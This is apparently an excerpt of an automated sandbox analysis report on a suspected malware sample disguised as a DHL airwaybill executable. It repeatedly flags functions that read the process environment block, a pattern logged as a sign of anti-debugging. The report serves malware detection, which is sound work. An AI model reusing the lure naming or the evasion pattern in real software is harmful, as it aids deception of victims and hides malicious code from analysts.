            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A2C3 mov eax, dword ptr fs:[00000030h]3_2_01B0A2C3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0A2C3 mov eax, dword ptr fs:[00000030h]3_2_01B0A2C3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AF823B mov eax, dword ptr fs:[00000030h]3_2_01AF823B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AF826B mov eax, dword ptr fs:[00000030h]3_2_01AF826B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB0274 mov eax, dword ptr fs:[00000030h]3_2_01BB0274
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B04260 mov eax, dword ptr fs:[00000030h]3_2_01B04260
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B04260 mov eax, dword ptr fs:[00000030h]3_2_01B04260
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B04260 mov eax, dword ptr fs:[00000030h]3_2_01B04260
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD625D mov eax, dword ptr fs:[00000030h]3_2_01BD625D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B06259 mov eax, dword ptr fs:[00000030h]3_2_01B06259
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBA250 mov eax, dword ptr fs:[00000030h]3_2_01BBA250
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBA250 mov eax, dword ptr fs:[00000030h]3_2_01BBA250
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B88243 mov eax, dword ptr fs:[00000030h]3_2_01B88243
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B88243 mov ecx, dword ptr fs:[00000030h]3_2_01B88243
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFA250 mov eax, dword ptr fs:[00000030h]3_2_01AFA250
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B245B1 mov eax, dword ptr fs:[00000030h]3_2_01B245B1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B245B1 mov eax, dword ptr fs:[00000030h]3_2_01B245B1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B805A7 mov eax, dword ptr fs:[00000030h]3_2_01B805A7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B805A7 mov eax, dword ptr fs:[00000030h]3_2_01B805A7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B805A7 mov eax, dword ptr fs:[00000030h]3_2_01B805A7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E59C mov eax, dword ptr fs:[00000030h]3_2_01B3E59C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B02582 mov eax, dword ptr fs:[00000030h]3_2_01B02582
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B02582 mov ecx, dword ptr fs:[00000030h]3_2_01B02582
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B34588 mov eax, dword ptr fs:[00000030h]3_2_01B34588
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B025E0 mov eax, dword ptr fs:[00000030h]3_2_01B025E0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E5E7 mov eax, dword ptr fs:[00000030h]3_2_01B2E5E7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3C5ED mov eax, dword ptr fs:[00000030h]3_2_01B3C5ED
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3C5ED mov eax, dword ptr fs:[00000030h]3_2_01B3C5ED
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B065D0 mov eax, dword ptr fs:[00000030h]3_2_01B065D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A5D0 mov eax, dword ptr fs:[00000030h]3_2_01B3A5D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A5D0 mov eax, dword ptr fs:[00000030h]3_2_01B3A5D0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E5CF mov eax, dword ptr fs:[00000030h]3_2_01B3E5CF
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E5CF mov eax, dword ptr fs:[00000030h]3_2_01B3E5CF
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10535 mov eax, dword ptr fs:[00000030h]3_2_01B10535
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10535 mov eax, dword ptr fs:[00000030h]3_2_01B10535
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10535 mov eax, dword ptr fs:[00000030h]3_2_01B10535
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10535 mov eax, dword ptr fs:[00000030h]3_2_01B10535
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10535 mov eax, dword ptr fs:[00000030h]3_2_01B10535
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10535 mov eax, dword ptr fs:[00000030h]3_2_01B10535
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E53E mov eax, dword ptr fs:[00000030h]3_2_01B2E53E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E53E mov eax, dword ptr fs:[00000030h]3_2_01B2E53E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E53E mov eax, dword ptr fs:[00000030h]3_2_01B2E53E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E53E mov eax, dword ptr fs:[00000030h]3_2_01B2E53E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2E53E mov eax, dword ptr fs:[00000030h]3_2_01B2E53E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B96500 mov eax, dword ptr fs:[00000030h]3_2_01B96500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BD4500 mov eax, dword ptr fs:[00000030h]3_2_01BD4500
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3656A mov eax, dword ptr fs:[00000030h]3_2_01B3656A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3656A mov eax, dword ptr fs:[00000030h]3_2_01B3656A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3656A mov eax, dword ptr fs:[00000030h]3_2_01B3656A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B08550 mov eax, dword ptr fs:[00000030h]3_2_01B08550
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B08550 mov eax, dword ptr fs:[00000030h]3_2_01B08550
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B344B0 mov ecx, dword ptr fs:[00000030h]3_2_01B344B0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8A4B0 mov eax, dword ptr fs:[00000030h]3_2_01B8A4B0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B064AB mov eax, dword ptr fs:[00000030h]3_2_01B064AB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBA49A mov eax, dword ptr fs:[00000030h]3_2_01BBA49A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B004E5 mov ecx, dword ptr fs:[00000030h]3_2_01B004E5
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A430 mov eax, dword ptr fs:[00000030h]3_2_01B3A430
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFC427 mov eax, dword ptr fs:[00000030h]3_2_01AFC427
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFE420 mov eax, dword ptr fs:[00000030h]3_2_01AFE420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFE420 mov eax, dword ptr fs:[00000030h]3_2_01AFE420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AFE420 mov eax, dword ptr fs:[00000030h]3_2_01AFE420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B86420 mov eax, dword ptr fs:[00000030h]3_2_01B86420
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B38402 mov eax, dword ptr fs:[00000030h]3_2_01B38402
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B38402 mov eax, dword ptr fs:[00000030h]3_2_01B38402
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B38402 mov eax, dword ptr fs:[00000030h]3_2_01B38402
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2A470 mov eax, dword ptr fs:[00000030h]3_2_01B2A470
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2A470 mov eax, dword ptr fs:[00000030h]3_2_01B2A470
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2A470 mov eax, dword ptr fs:[00000030h]3_2_01B2A470
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8C460 mov ecx, dword ptr fs:[00000030h]3_2_01B8C460
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B2245A mov eax, dword ptr fs:[00000030h]3_2_01B2245A
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BBA456 mov eax, dword ptr fs:[00000030h]3_2_01BBA456
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E443 mov eax, dword ptr fs:[00000030h]3_2_01B3E443
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E443 mov eax, dword ptr fs:[00000030h]3_2_01B3E443
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E443 mov eax, dword ptr fs:[00000030h]3_2_01B3E443
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E443 mov eax, dword ptr fs:[00000030h]3_2_01B3E443
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E443 mov eax, dword ptr fs:[00000030h]3_2_01B3E443
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E443 mov eax, dword ptr fs:[00000030h]3_2_01B3E443
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E443 mov eax, dword ptr fs:[00000030h]3_2_01B3E443
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3E443 mov eax, dword ptr fs:[00000030h]3_2_01B3E443
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01AF645D mov eax, dword ptr fs:[00000030h]3_2_01AF645D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BB47A0 mov eax, dword ptr fs:[00000030h]3_2_01BB47A0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B007AF mov eax, dword ptr fs:[00000030h]3_2_01B007AF
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01BA678E mov eax, dword ptr fs:[00000030h]3_2_01BA678E
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B047FB mov eax, dword ptr fs:[00000030h]3_2_01B047FB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B047FB mov eax, dword ptr fs:[00000030h]3_2_01B047FB
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8E7E1 mov eax, dword ptr fs:[00000030h]3_2_01B8E7E1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B227ED mov eax, dword ptr fs:[00000030h]3_2_01B227ED
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B227ED mov eax, dword ptr fs:[00000030h]3_2_01B227ED
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B227ED mov eax, dword ptr fs:[00000030h]3_2_01B227ED
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0C7C0 mov eax, dword ptr fs:[00000030h]3_2_01B0C7C0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B807C3 mov eax, dword ptr fs:[00000030h]3_2_01B807C3
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7C730 mov eax, dword ptr fs:[00000030h]3_2_01B7C730
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3273C mov eax, dword ptr fs:[00000030h]3_2_01B3273C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3273C mov ecx, dword ptr fs:[00000030h]3_2_01B3273C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3273C mov eax, dword ptr fs:[00000030h]3_2_01B3273C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3C720 mov eax, dword ptr fs:[00000030h]3_2_01B3C720
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3C720 mov eax, dword ptr fs:[00000030h]3_2_01B3C720
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B00710 mov eax, dword ptr fs:[00000030h]3_2_01B00710
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B30710 mov eax, dword ptr fs:[00000030h]3_2_01B30710
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3C700 mov eax, dword ptr fs:[00000030h]3_2_01B3C700
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B08770 mov eax, dword ptr fs:[00000030h]3_2_01B08770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10770 mov eax, dword ptr fs:[00000030h]3_2_01B10770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10770 mov eax, dword ptr fs:[00000030h]3_2_01B10770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10770 mov eax, dword ptr fs:[00000030h]3_2_01B10770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10770 mov eax, dword ptr fs:[00000030h]3_2_01B10770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10770 mov eax, dword ptr fs:[00000030h]3_2_01B10770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10770 mov eax, dword ptr fs:[00000030h]3_2_01B10770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10770 mov eax, dword ptr fs:[00000030h]3_2_01B10770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10770 mov eax, dword ptr fs:[00000030h]3_2_01B10770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10770 mov eax, dword ptr fs:[00000030h]3_2_01B10770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10770 mov eax, dword ptr fs:[00000030h]3_2_01B10770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10770 mov eax, dword ptr fs:[00000030h]3_2_01B10770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B10770 mov eax, dword ptr fs:[00000030h]3_2_01B10770
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B00750 mov eax, dword ptr fs:[00000030h]3_2_01B00750
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42750 mov eax, dword ptr fs:[00000030h]3_2_01B42750
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42750 mov eax, dword ptr fs:[00000030h]3_2_01B42750
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B8E75D mov eax, dword ptr fs:[00000030h]3_2_01B8E75D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B84755 mov eax, dword ptr fs:[00000030h]3_2_01B84755
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3674D mov esi, dword ptr fs:[00000030h]3_2_01B3674D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3674D mov eax, dword ptr fs:[00000030h]3_2_01B3674D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3674D mov eax, dword ptr fs:[00000030h]3_2_01B3674D
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B366B0 mov eax, dword ptr fs:[00000030h]3_2_01B366B0
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3C6A6 mov eax, dword ptr fs:[00000030h]3_2_01B3C6A6
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B04690 mov eax, dword ptr fs:[00000030h]3_2_01B04690
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B04690 mov eax, dword ptr fs:[00000030h]3_2_01B04690
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B7E6F2
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B7E6F2
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B7E6F2
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B7E6F2 mov eax, dword ptr fs:[00000030h]3_2_01B7E6F2
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B806F1 mov eax, dword ptr fs:[00000030h]3_2_01B806F1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B806F1 mov eax, dword ptr fs:[00000030h]3_2_01B806F1
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A6C7 mov ebx, dword ptr fs:[00000030h]3_2_01B3A6C7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B3A6C7 mov eax, dword ptr fs:[00000030h]3_2_01B3A6C7
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B36620 mov eax, dword ptr fs:[00000030h]3_2_01B36620
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B38620 mov eax, dword ptr fs:[00000030h]3_2_01B38620
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1E627 mov eax, dword ptr fs:[00000030h]3_2_01B1E627
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B0262C mov eax, dword ptr fs:[00000030h]3_2_01B0262C
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B42619 mov eax, dword ptr fs:[00000030h]3_2_01B42619
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1260B mov eax, dword ptr fs:[00000030h]3_2_01B1260B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1260B mov eax, dword ptr fs:[00000030h]3_2_01B1260B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1260B mov eax, dword ptr fs:[00000030h]3_2_01B1260B
            Source: C:\Users\user\Desktop\DHL airwaybill # 6913321715 & BL Draft copy.exeCode function: 3_2_01B1260B mov eax, dword ptr fs:[00000030h]3_2_01B1260B
